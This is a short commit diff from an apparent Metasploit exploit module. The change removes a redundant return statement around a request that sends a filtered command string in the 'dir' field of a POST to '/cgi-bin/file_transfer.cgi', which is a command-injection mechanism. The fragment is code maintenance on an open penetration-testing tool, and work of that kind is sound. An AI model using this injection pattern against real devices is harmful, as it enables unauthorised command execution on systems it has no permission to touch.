Removed redundant return statement
This commit is contained in:
@@ -67,13 +67,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
dir: "'#{filter_bad_chars(cmd)}'"
|
||||
}
|
||||
|
||||
resp = send_request_cgi({
|
||||
send_request_cgi({
|
||||
'uri' => '/cgi-bin/file_transfer.cgi',
|
||||
'method' => 'POST',
|
||||
'vars_post' => vars_post
|
||||
}, timeout)
|
||||
|
||||
return resp
|
||||
end
|
||||
|
||||
def check
|
||||
|
||||
Reference in New Issue
Block a user